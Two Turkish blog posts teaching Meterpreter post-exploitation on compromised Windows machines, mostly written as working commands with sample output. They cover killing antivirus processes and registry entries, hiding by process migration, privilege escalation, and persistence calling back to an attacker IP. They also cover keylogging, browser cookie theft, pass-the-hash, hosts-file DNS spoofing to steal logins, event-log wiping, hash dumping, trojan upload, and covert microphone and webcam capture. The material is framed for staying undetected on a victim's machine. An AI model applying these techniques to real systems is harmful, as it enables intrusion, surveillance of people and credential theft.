Kategoriler
Linux Metasploit Siber Güvenlik

Meterpreter ile Post Exploitation 2

Geçen hafta hazırladığım Meterpreter ile post exploitation evresini tek yazıya sığdırmam pek de mümkün değildi. Bu hafta seriye devam edeceğim. Bu yazıda ağırlıklı bulunan aşamalar ise, yetki yükseltme, kalıcılığı sağlama ve kullanıcıya yakalanmama süreçleri olacak. 

Antivirüs ve Firewall Kapatma

Post exploitation aşamasında, antivirüsler durumu fark edip sıkıntı yapabiliyorlar. Bu durumda makineye girmişken kaybetmek olmaz. Antivirüsleri ve firewalları saf dışı bırakmamız gerekiyor.

getcountermeasure

meterpreter > run getcountermeasure -d -k
[*]Running Getcountermeasure on the target...
[*]Checking for countermeasure...
[*]Getting Windows Bilt in Firewall configuration...
...snip...

Firewall ve antivirüsleri devre dışı bırakmak için kullanılan bu scriptte, [vurgu color=”#dd3333″]-d[/vurgu] parametresi firewalları, [vurgu color=”#dd3333″]-k[/vurgu] parametresi ise antivürsleri devre dışı bırakır. Ancak çoğu antivirüs için yeterli bir çözüm olmadığını bilmemiz iyi olacak. Shell komutu ile komut penceresine erişelim. Söz konusu antivirüsün processini bulmamız gerekiyor. ps komutu ile göz atabilirsiniz. Ancak daha pratik bir yolu var.

Tasklist /SVC | find /I “avg” = avg

Bu şekilde anahtar kelime üzerinden processler üzerinde arama yapabiliriz. Daha sonra bulduğumuz processi devre dışı bırakmayı deneyeceğiz.

sc config avgwd start= disabled

taskkill /F /IM “avg*”

Yukarıda önce avgwd processini devre dışı bırakmayı denedik. Çalışmaması halinde sonraki satırda yer alan komutla avg ile başlayan tüm processleri kapatmayı deneyebiliriz. Bunlar da işe yaramazsa bir şansımız daha var: Regedit üzerinde değişiklik yapmak. Öncelikle söz konusu dizindeki kayıtları listeleyelim. Daha sonra AVG_UI gibi, antivirüs ismine göre bir kayıt bulmanız olası.

reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Bu durumda o kaydı silmek bizim işimizi çok kolaylaştıracaktır. Bu defa deleteval kullanarak -v parametresi ile kayıt ismini veriyoruz ve kaydı kaldırıyoruz. Kayıtlara tekrar baktığınızda muhtemelen kayıt artık orada olmayacaktır. 

reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v AVG_UI

Yetki Yükseltme İşlemi

Migrate

Sistemdeki diğer processlere, elimizdeki backdoorumuzu yapıştırabiliriz. Bu durumda kullanıcı, görev yöneticisine baktığında, olağan dışı bir durum görmeyecektir. Fakat bizim yapıştığımız sıradan process, çalıştığı müddetçe, biz de sistemde var olacağız demektir. Bu durumda yapışmak için seçtiğimiz process de önemli diyebiliriz. Diğer mesele ise, söz konusu processin yetkisi dahilinde işlem yapma şansımız olacak demektir. Sınırlı yetkilere sahipken, bu yöntemle yetki yükseltme işlemi yapabiliriz. Aksi de mümkün ancak bu çok da mantıklı olmayacaktır 🙂

ps komutu ile porcesslere bakalım. Backdoorumuz da listede bulunacaktır. Daha sonra bulaşmak istediğimiz processi belirleyelim ve onun [vurgu color=”#dd3333″]PID[/vurgu] değerini alalım. Sonrasında ise geriye şu komutu yazmak kalıyor:

meterpreter > migrate <PID>
[*] Migrating from 415 to 680…
Migration completed succesfully.

Local Exploit

Sistemde yetki yükseltme aşamasında local exploitlerden de faydalanabiliriz. Söz konusu exploitleri metasploit üzerinden aramak mümkün. Bundan sonrasında devam edeceğimiz örnek Windows XP,  7 gibi versiyonlarda çalışırken 8 ve 10 üzerinde çalışmıyor. Exploiti seçtikten sonra info diyerek hangi sistemlerde çalışabildiğini görebilirsiniz.

msf exploit(handler) > use ecploit/windwos/local/ppr_flatten_rec

msf exploit(ppr_flatten_rec) > set SESSION 1

Bu ayarlama sonrasında exploiti kullanarak devam ediyoruz. Şayet meterpreter üzerinde ikinci oturumumuz açılırsa exploit başarılı oldu demektir. İkinci oturuma bağlanarak tam erişimle devam edebiliriz. Yalnız local exploitlerle yetki yükseltirken önemli bir detayımız var. [vurgu color=”#dd3333″]getsystem[/vurgu] gibi komutların sonrasında, local exploitler çalıştırıldığında hata ile karşılaşabilirsiniz. Exploit, daha önce yetki yükseltme işlemi yaptığınızı varsayabilir. Şayet ikinci oturum açılmazsa ilk oturumdan devam ederek farklı taktikler denenebilir. 

Backdoor’un kalıcılığını sağlama yöntemleri

Sisteme girdikten sonra genelde en büyük isteğimiz sistemde kalabilmek. Bunun için de bazı yöntemler var. Yetki yükseltme aşamasında bahsettiğimiz migrate kısmını da kalıcılık kısmına dahil edebiliriz. Yaptığımız birçok işlem aslında sistemde tutunabilmek için.

persistence

[vurgu color=”#dd3333″]run persistence -h [/vurgu] komutu ile detaylarını öğrenebileceğiniz bu eklenti, otomatik olarak sistemde kalıcı olmamızı sağlayan işlemleri halleder.

 • -A: Backdoor dinlenmeye alındığında otomatik olarak bağlantı gelmesini sağlar.
 • -L </dizinismi>: Backdoor’un otomatik kayıt edileceği konum seçilir. Default durumda temp klasörü seçilir.
 • -P<payload>: Seçilecek olan payload girilir.
 • -S: Backdoor bir sistem dosyası gibi çalışır. Haliyle sistem yetkisinde çalışılır.
 • -i: Bağlantı isteklerinin kaç saniyede bir gönderileceğini buradan belirleyebilirsiniz.
 • -X: Sistem açıldığında çalışacak başka bir backdoorun kurulmasını sağlar.
 • -p: Bağlantının geleceği portu seçebilirsiniz. Backdoor için oluşturacağınız porttan bahsediyorum.
 • -r: Saldırganın IP adresi yazılır.

meterpreter > run persistence -A -U user -L C:\\windows\\system32 -i 20 -p 4444 -r 192.168.1.98

Diğer komutlar

keylogrecorder

Karşı tarafın bastığı her tuşu kaydedip incelemek mümkün. Farklı özelliklere sahip bu eklentinin diğer özellikleri için keylogrecorder -h komutunu kullanarak bilgi edinebilirsiniz. Aşağıdaki komutta ise önce [vurgu color=”#dd3333″]-t[/vurgu] parametresi ile  saniyelik bir kayıt aldık. Daha sonra ise kaydolduğu dizine giderek sonuçları listeledik.

meterpreter > run keylogrecorder -t  10

meterpreter > cat /root/.msf4/logs/scripts/keylogrecorder/192.168.1.98_20190210.1123.txt

keyscan

Bu araç ise çok daha basit bir tuş kayıt aracı. Start ile başlıyor, dump ile kayıtları ortaya döküyor, stop ile duruyor. Hepsi bu 🙂

meterpreter > keyscan_start

Starting the keystroke sniffer…

meterpreter > keyscan_dump

Dumping captured keystrokes…

meterpreter > keyscan_stop

Stopping the keystroke sniffer…

Browserlardan veri almak

Karşı makinenin browserları üzerinden cookie, geçmiş kayıtları gibi bilgileri çekmek mümkün. Farklı tarayıcılar için farklı komutlar gerekiyor. Kaydolan dosyaları SQLite Database Browser gibi araçlarla inceleyebilirsiniz. 

meterpreter > run post/windows/gather/enum_chrome

meterpreter > run enum/firefox

meterpreter > run post/windows/gather/enum_ie

Psexec pass the hash

Önceki yazıda makinedeki kullanıcıların hash bilgilerini elde etmiştik. Şimdi o kullanıcı hashleri ile sisteme giriş yapmayı deneyelim. Bu hashlerle giriş yapmak için, hashleri kırmaya gerek yok.

[vurgu color=”#dd3333″]exploit/windows/smb/psexec[/vurgu] exploitini kullanarak gerekli parametreleri giriyoruz. [vurgu color=”#dd3333″]SMBUser[/vurgu] kısmına hash üzerinde bulunan ilk kısmı, [vurgu color=”#dd3333″]SMBPass[/vurgu] kısmına ise, hash üzerindeki son ve uzun kısmı alarak giriyoruz. Yalnız kullanıcı adı sonrasında gelen kısa sayılar hariç. Örneğin:

[vurgu color=”#dd3333″]Administrator:500:aad3b435b51404eeaad3basd34:12f2wpcv139mnbpol109zxd09dfhg0[/vurgu]

Burada “Administrator” kısmı SMBUser alanına, “aad3b435b51404eeaad3basd34:12f2wpcv139mnbpol109zxd09dfhg0” kısmı ise SMBPass alanına girilecek. Sonrasında exploiti denediğimizde çalışacaktır. Birkaç sefer denemek gerekebilir. 

Versiyon öğrenme

Makinede yüklü olan yazılımların versiyonlarını öğrenmek için aşağıdaki komut yeterli olacaktır.

meterpreter > run get_application_list

Bazı donanımların kontrolünü sağlama

Siz bir işlem yaptığınız esnada karşı tarafta bir donanımın kullanılmaz olmasını, müdahale edememesini isteyebilirsiniz. Bu durumda aşağıdaki komut yeterli olacaktır

meterpreter > uictl disabled keyboard

meterpreter > uictl disabled mouse

Enable diyerek tekrar aktif hale getirebiliriz. 

DNS spoofing işlemi

DNS Spoofing, ayrı bir yazı konusu olmakla beraber özet geçmek gerekirse kullanıcıyı, bizim belirlediğimiz sayfaya yönlendirmek anlamına gelir. Bu şekilde kendi oluşturduğunuz sahte bir web sitesini, kullanıcının girdiği domain ile değiştirerek giriş bilgilerini elinden alabilirsiniz. Aşağıdaki örnekte, boşluktan  sonra belirtilen domaine girildiğinde, boşluktan önce yazılan IP adresine yönlendirilmesini sağlar. Örneğin test.txt isminde bir dosya oluşturalım ve içine şunu yazalım:

172.252.110.27 google.com

Daha sonra aracımızı nasıl kullanacağız ona bakalım.

meterpreter > run hostsedit -l text.txt

Not defterinden birden fazla web sitesini bu şekilde yönlendirmeye alabilirsiniz. Ancak bir tane yönlendirme yapacaksanız aşağıdaki komut yeterli olacaktır.

meterpreter > run hostsedit -e 172.252.110.27,google.com

CheckVM

Karşı makinenin sanal makine olup olmadığını teyit etmek için kullanılır.

meterpreter > run post/windows/gather/checkvm

Sniffing

Makine üzerindeki network paketlerinin takibini ve incelenmesini sağlar.

meterpreter > sniffer_start
[*]Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/packets.cap

 

Kategoriler
Linux Metasploit Siber Güvenlik

Meterpreter ile Post Exploitation

Metasploit serisinde öğrendikleriniz, herhangi bir zafiyetli makineye girmeniz için yeterli. Ancak makineye girdikten sonra ne yapabileceğinizi de öğrenmeniz gerekiyor. Ki en az söz konusu kullanıcı kadar hareket kabiliyetimiz var. Bu yazıda meterpreter ile karşı makinede yapabileceklerimizden bahsedeceğim. Meterpreter içerisinde birçok script bulunduran bir araç. Bu scriptler, bizim, girdiğimiz sistemde daha hızlı işlem yapmamızı sağlar. Meterpreter, sistem üzerinde çalıştığı için antivirüslere yakalanma ve iz bırakma olasılığı çok düşüktür.

Yazımı Offensive Security’den çevirdim ve büyük oranda ondan faydalanmakla beraber bazı eklemelerde bulundum. Meterpreter’in detaylarını ise farklı bir yazıda hazırlayacağım.

help

meterpreter > help

Core Commands
=============

  Command    Description
  -------    -----------
  ?       Help menu
  background  Backgrounds the current session
  channel    Displays information about active channels
...snip...

Linux üzerindeki daimi kurtarıcımız “help” komutu ile başlayalım. Help komutu ile meterpreter üzerindeki komutların açıklamalarını öğrenebilirsiniz. 

background & sessions

Bir makineye girdiğinizde, o makinenin meterpreter erişimini kaybetmeden çıkarak başka işlem yapmak istiyorsanız background komutunu kullanabilirsiniz. Bu komut size birden fazla makineye bağlanma ve farklı exploitler deneme gibi imkanlar tanır.

Arka plana aldığınız makineleri listelemek için sessions yazmanız yeterli. Bağlanmak istediğiniz makine için ise sessions -i <ID> yazmanız gerek.

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

cat

Bu komutu kullanarak karşı makinedeki txt ve türevi dosyaların içerisini okuyabilirsiniz.Tıpkı Linux üzerinde olduğu gibi…

meterpreter > cat
Usage: cat file

//Example usage:
meterpreter > cat edit.txt
What you talkin' about Willis

cd & pwd

Dizin değiştirmek için cd komutunu, hangi dizinde olduğunuzu görmek için ise pwd komutunu kullanabilirsiniz.

meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

clearev

Sistemde iz bırakmamak için basit bir önlem… Windows sistemlerde uygulama, sistem ve güvenlik günlüklerini temizleyecektir.

Komut öncesinde günlük:

https://www.offensive-security.com/wp-content/uploads/2015/05/Clearev_before.png

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >
Komut sonrası günlük:
https://www.offensive-security.com/wp-content/uploads/2015/05/Clearev_after.png

Download

Karşı makineden dosya indirmemizi sağlar.

meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

Karşı makineden hangi dizine indireceğinizi belirtmek için ise aşağıdaki yöntemi izlemeniz gerekiyor.

meterpreter > download -r metin.txt /root/Desktop

[*] downloading: c:\metin.txt -> /root/Desktop/metin.txt
[*] downloaded : c:\metin.txt -> /root/Desktop/metin.txt

Edit

Metin ve türevi dosyaların üzerinde değişiklik yapmamızı sağlar. Vim aracını kullanır.
meterpreter > edit edit.txt

Execute

Karşı makinede komut çalıştırabilmemizi sağlar. Aşağıdaki örnekte bizim için cmd.exe’yi çalıştıran bir komut var. Sonrasında yazacağımız komutları cmd üzerinden devam ettirebiliriz.

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Getuid

Hangi yetkilerle erişimde bulunduğumuzu belirtir. Duruma göre yetki yükseltme işlemlerine geçilir. Bunları ayrı bir yazıda anlatacağız.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Hashdump

En tatlı komutlarımızdan birisi 🙂 Sisteme ait kullanıcıların, kullanıcı adları ve hashleri elimizde. Hashleri kırmak için uğraşmanıza gerek yok. Onları kullanarak zaten sistemde o kullanıcı üzerinden giriş yapabiliyor olacağız. Ancak bu da başka bir yazının konusu.

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

idletime

Karşı makinede kullanıcının ne zamandır boşta olduğunu belirten komut.

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

ipconfig

Windows makinede olduğunuzu varsayarsak ağ arayüzünü görüntüler. Yerel IP adresi, alt ağ maskesi ve varsayılan ağ geçidi gibi bilgileri verir. 

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask   : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask   : 255.255.0.0

meterpreter >

ls

Siz meterpreter ekranı boyunca karşı makinede işlem yapıyorsunuz. Ancak kendi makinenizdeki dosyaları incelemeniz gerekirse ne yapacaksınız? Bu durumda devreye bu komutlar giriyor. lpwd ile yerel makinenizde hangi dizinde bulunduğunuzu, lcd ile ise yine yerel makinenizde hangi dizine geçmek istediğinizi belirtebilirsiniz.

meterpreter > lpwd
/root

meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
meterpreter >

ls

Linux üzerinde yaptığınız gibi, bulunduğunuz dizindeki dosyaları listelemenizi sağlar.

meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode       Size   Type Last modified          Name
----       ----   ---- -------------          ----
40777/rwxrwxrwx  0    dir  Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx  0    dir  Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218   fil  Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x  0    dir  Wed Nov 04 19:44:05 -0700 2009 Application Data
...snip...

ps

ps komutu ile karşı makinede çalışan processleri listeleyebilirsiniz.

meterpreter > ps

Process list
============

  PID  Name         Path
  ---  ----         ----
  132  VMwareUser.exe    C:\Program Files\VMware\VMware Tools\VMwareUser.exe
  152  VMwareTray.exe    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
  288  snmp.exe       C:\WINDOWS\System32\snmp.exe
...snip...

Record Mic

record_mic komutu ile karşı makinenin mikrofonundan ses kaydı alabilirsiniz. Bu bir görüşmeye de ait olabilir, o anki ortama ait kayıt da olabilir. -d parametresi ile kaç saniye kayıt alacağını belirleyebilirsiniz. Siz belirtmezseniz Ctrl+C komutuna kadar kaydetmeye devam edecektir. -f parametresi ile ise makinenizde nereye kaydedeceğinizi belirtebilirsiniz.

meterpreter > record_mic -d 30 -f root/Desktop/kayit.wav

Resource

Bu komut ile verdiğiniz kaynaktan alınan komutların arka arkaya çalışmasını sağlayabilirsiniz. Metin belgesine yazdığınız her satır bir komut olarak kabul edilecektir. Karşı makinede çalıştıracağınız komutların hızlı ve otomatize bir şekilde gerçekleşmesini sağlayabilirsiniz. Şöyle örnek verelim, aşağıdaki bizim dosyamız olsun:

root@kali:~# cat resource.txt
ls
background
root@kali:~#

Şimdi bu dosyayı resource ile çalıştıralım. 

meterpreter> > resource resource.txt
[*] Reading /root/resource.txt
[*] Running ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode       Size  Type Last modified       Name
----       ----  ---- -------------       ----
40777/rwxrwxrwx  0    dir  2012-02-29 16:41:29 -0500 .
40777/rwxrwxrwx  0    dir  2012-02-02 12:24:40 -0500 ..
100666/rw-rw-rw- 606   fil  2012-02-15 17:37:48 -0500 IDA Pro Free.lnk
100777/rwxrwxrwx 681984 fil  2012-02-02 15:09:18 -0500 Sc303.exe
100666/rw-rw-rw- 608   fil  2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk
100666/rw-rw-rw- 522   fil  2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk

[*] Running background

[*] Backgrounding session 1...
msf exploit(handler) >

rm

Bu komut ile karşı makineden dosya silmeniz mümkün. Silinen dosyalar geri dönüşüm kutusuna veya başka yere düşmez. Tamamen kaldırılır.

meterpreter > rm dosyaismi.txt

Screenshot

Bu komut sayesinde ise makineden ekran görüntüsü almak mümkün. screenshot -h parametresi ile detayları öğrenebilirsiniz. Aşağıdaki örnekte -p parametresi, ekran görüntüsünün sizin makinenizde nereye kaydedileceğini, -q parametresi ise görüntü kalitesini belirler. Varsayılan ayar 50’dir.

meterpreter > screenshot -p /root/Desktop/screenshoot.jpeg -q 75
Screenshot saved to: /root/Desktop/screenshoot.jpeg

Search

Search komutu anlayacağınız üzere, karşı makinede dosya aramamızı sağlar. Belirli bir dosya adı arayabileceğimiz gibi, belirli bir dosya türünden olan tüm dosyaları arayabilir, aynı zamanda belirli bir dizinde arama yapabiliriz. Aşağıda kullanımına dair birkaç örneğe yer verdim.

meterpreter > search -f autoexec.bat
Found 1 result...
  c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
  c:\\xampp\perl\bin\search.bat (57035 bytes)
meterpreter > search -f *.bat 
Found 1 result... 
  c:\AUTOEXEC.BAT

Shell

Yukarıda bir yerlerde cmd.exe dosyasını çalıştırmıştım gördünüz mü? Cmd.exe için onu unutabilirsiniz. Siz onu başka exe dosyalarında kullanın. cmd.exe için meterpreter ekranına shell yazmanız yeterli. Bundan sonrasında windows komutları ile devam edebilirsiniz. exit komutu ile komut penceresinden meterpretera dönebilirsiniz.

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Upload

Karşı makineden dosya çekebildiğiniz gibi kendi makinenizden karşı bilgisayara dosya da gönderebilirsiniz. Belki de orada sizin çalıştırmak istediğiniz bir exe dosyası vardır. Onun için de upload komutunu kullanıyoruz.

meterpreter > upload /root/Desktop/evil_trojan.exe c:\\windows\\system32
[*] uploading : /root/Desktop/evil_trojan.exe -> c:\windows\system32
[*] uploaded  : /root/Desktop/evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

Webcam

Eğlenceli komutlardan birisi olan webcam ile karşı makinenin kamerasından anlık fotoğraf alabilir, video kaydedebilirsiniz. Peki birden fazla kamera varsa? O zaman hangisinden isterseniz ondan kayıt alırsınız.

webcam_list: Hedef makinede bulunan webcamleri listeler.

webcam_chat: Karşılıklı bir görüntülü konuşma başlatabilirsiniz.

webcam_stream: Bu komutla karşı makineden kamera kaydı alırsınız. Tarayıcınızda açılan sayfa üzerinden takip edebilirsiniz ve -t parametresi ile görüntüleri nereye kaydetmek istediğinizi belirtebilirsiniz.

webcam_snap: Karşı makinenin kamerasından anlık fotoğraf çeker. Aşağıda bir örnek var. Bu örnekteki -i parametresi kamera ID’si oluyor:

meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >

Ufak bir not: Kapaktaki çocuk muhtemelen ilginizi çekti. Çok da alay etmeyin isterseniz. Kendileri akıllı oyuncakları dinleme cihazına dönüştüren 12 yaşında bir çocuk. https://www.cbsnews.com/news/reuben-paul-12-year-old-cyber-ninja-cyber-security/